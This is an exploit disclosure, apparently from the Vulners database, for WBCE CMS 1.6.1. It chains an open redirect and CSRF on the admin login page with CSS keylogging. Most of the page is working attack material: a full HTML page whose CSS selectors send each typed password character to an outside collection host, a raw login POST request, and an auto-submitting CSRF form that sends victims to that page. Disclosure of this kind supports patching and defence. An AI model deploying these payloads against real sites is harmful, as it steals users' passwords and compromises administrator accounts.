Vulners
Lucene search
WBCE CMS 1.6.1 - Open Redirect & CSRF Vulnerability
Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
Version: 1.6.1
Bugs: Open Redirect + CSRF = CSS KEYLOGGING
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date of found: 03-07-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
1. Login to Account
2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)
3. Then you upload html file .(html file content is as below)
'''
<html>
<head>
<title>
Login
</title>
<style>
input[type="password"][value*="q"]{
background-image: url('https://enflownwx6she.x.pipedream.net/q');}
input[type="password"][value*="w"]{
background-image: url('https://enflownwx6she.x.pipedream.net/w');}
input[type="password"][value*="e"]{
background-image: url('https://enflownwx6she.x.pipedream.net/e');}
input[type="password"][value*="r"]{
background-image: url('https://enflownwx6she.x.pipedream.net/r');}
input[type="password"][value*="t"]{
background-image: url('https://enflownwx6she.x.pipedream.net/t');}
input[type="password"][value*="y"]{
background-image: url('https://enflownwx6she.x.pipedream.net/y');}
input[type="password"][value*="u"]{
background-image: url('https://enflownwx6she.x.pipedream.net/u');}
input[type="password"][value*="i"]{
background-image: url('https://enflownwx6she.x.pipedream.net/i');}
input[type="password"][value*="o"]{
background-image: url('https://enflownwx6she.x.pipedream.net/o');}
input[type="password"][value*="p"]{
background-image: url('https://enflownwx6she.x.pipedream.net/p');}
input[type="password"][value*="a"]{
background-image: url('https://enflownwx6she.x.pipedream.net/a');}
input[type="password"][value*="s"]{
background-image: url('https://enflownwx6she.x.pipedream.net/s');}
input[type="password"][value*="d"]{
background-image: url('https://enflownwx6she.x.pipedream.net/d');}
input[type="password"][value*="f"]{
background-image: url('https://enflownwx6she.x.pipedream.net/f');}
input[type="password"][value*="g"]{
background-image: url('https://enflownwx6she.x.pipedream.net/g');}
input[type="password"][value*="h"]{
background-image: url('https://enflownwx6she.x.pipedream.net/h');}
input[type="password"][value*="j"]{
background-image: url('https://enflownwx6she.x.pipedream.net/j');}
input[type="password"][value*="k"]{
background-image: url('https://enflownwx6she.x.pipedream.net/k');}
input[type="password"][value*="l"]{
background-image: url('https://enflownwx6she.x.pipedream.net/l');}
input[type="password"][value*="z"]{
background-image: url('https://enflownwx6she.x.pipedream.net/z');}
input[type="password"][value*="x"]{
background-image: url('https://enflownwx6she.x.pipedream.net/x');}
input[type="password"][value*="c"]{
background-image: url('https://enflownwx6she.x.pipedream.net/c');}
input[type="password"][value*="v"]{
background-image: url('https://enflownwx6she.x.pipedream.net/v');}
input[type="password"][value*="b"]{
background-image: url('https://enflownwx6she.x.pipedream.net/b');}
input[type="password"][value*="n"]{
background-image: url('https://enflownwx6she.x.pipedream.net/n');}
input[type="password"][value*="m"]{
background-image: url('https://enflownwx6she.x.pipedream.net/m');}
input[type="password"][value*="Q"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
input[type="password"][value*="W"]{
background-image: url('https://enflownwx6she.x.pipedream.net/W');}
input[type="password"][value*="E"]{
background-image: url('https://enflownwx6she.x.pipedream.net/E');}
input[type="password"][value*="R"]{
background-image: url('https://enflownwx6she.x.pipedream.net/R');}
input[type="password"][value*="T"]{
background-image: url('https://enflownwx6she.x.pipedream.net/T');}
input[type="password"][value*="Y"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
input[type="password"][value*="U"]{
background-image: url('https://enflownwx6she.x.pipedream.net/U');}
input[type="password"][value*="I"]{
background-image: url('https://enflownwx6she.x.pipedream.net/I');}
input[type="password"][value*="O"]{
background-image: url('https://enflownwx6she.x.pipedream.net/O');}
input[type="password"][value*="P"]{
background-image: url('https://enflownwx6she.x.pipedream.net/P');}
input[type="password"][value*="A"]{
background-image: url('https://enflownwx6she.x.pipedream.net/A');}
input[type="password"][value*="S"]{
background-image: url('https://enflownwx6she.x.pipedream.net/S');}
input[type="password"][value*="D"]{
background-image: url('https://enflownwx6she.x.pipedream.net/D');}
input[type="password"][value*="F"]{
background-image: url('https://enflownwx6she.x.pipedream.net/F');}
input[type="password"][value*="G"]{
background-image: url('https://enflownwx6she.x.pipedream.net/G');}
input[type="password"][value*="H"]{
background-image: url('https://enflownwx6she.x.pipedream.net/H');}
input[type="password"][value*="J"]{
background-image: url('https://enflownwx6she.x.pipedream.net/J');}
input[type="password"][value*="K"]{
background-image: url('https://enflownwx6she.x.pipedream.net/K');}
input[type="password"][value*="L"]{
background-image: url('https://enflownwx6she.x.pipedream.net/L');}
input[type="password"][value*="Z"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
input[type="password"][value*="X"]{
background-image: url('https://enflownwx6she.x.pipedream.net/X');}
input[type="password"][value*="C"]{
background-image: url('https://enflownwx6she.x.pipedream.net/C');}
input[type="password"][value*="V"]{
background-image: url('https://enflownwx6she.x.pipedream.net/V');}
input[type="password"][value*="B"]{
background-image: url('https://enflownwx6she.x.pipedream.net/B');}
input[type="password"][value*="N"]{
background-image: url('https://enflownwx6she.x.pipedream.net/N');}
input[type="password"][value*="M"]{
background-image: url('https://enflownwx6she.x.pipedream.net/M');}
input[type="password"][value*="1"]{
background-image: url('https://enflownwx6she.x.pipedream.net/1');}
input[type="password"][value*="2"]{
background-image: url('https://enflownwx6she.x.pipedream.net/2');}
input[type="password"][value*="3"]{
background-image: url('https://enflownwx6she.x.pipedream.net/3');}
input[type="password"][value*="4"]{
background-image: url('https://enflownwx6she.x.pipedream.net/4');}
input[type="password"][value*="5"]{
background-image: url('https://enflownwx6she.x.pipedream.net/5');}
input[type="password"][value*="6"]{
background-image: url('https://enflownwx6she.x.pipedream.net/6');}
input[type="password"][value*="7"]{
background-image: url('https://enflownwx6she.x.pipedream.net/7');}
input[type="password"][value*="8"]{
background-image: url('https://enflownwx6she.x.pipedream.net/8');}
input[type="password"][value*="9"]{
background-image: url('https://enflownwx6she.x.pipedream.net/9');}
input[type="password"][value*="0"]{
background-image: url('https://enflownwx6she.x.pipedream.net/0');}
input[type="password"][value*="-"]{
background-image: url('https://enflownwx6she.x.pipedream.net/-');}
input[type="password"][value*="."]{
background-image: url('https://enflownwx6she.x.pipedream.net/.');}
input[type="password"][value*="_"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
input[type="password"][value*="@"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
input[type="password"][value*="?"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
input[type="password"][value*=">"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
input[type="password"][value*="<"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
input[type="password"][value*="="]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
input[type="password"][value*=":"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
input[type="password"][value*=";"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
</style>
</head>
<body>
<label>Please enter username and password</label>
<br><br>
Password:: <input type="password" />
<script>
document.querySelector('input').addEventListener('keyup', (evt)=>{
evt.target.setAttribute('value', evt.target.value);
})
</script>
</body>
</html>
'''
4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url.
5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)
POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
Host: localhost
Content-Length: 160
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
Connection: close
url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login
6.If write as (https://ATTACKER.com) in url parameter on abowe request on you redirect to attacker.com.
7.We write to html files url
url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html
8.And create csrf-poc with csrf.poc.generator
<html>
<title>
This CSRF was found by miri
</title>
<body>
<h1>
CSRF POC
</h1>
<form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim.
Poc video : https://youtu.be/m-x_rYXTP9E
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jul 2023 00:00Current
7.1High risk
Vulners AI Score7.1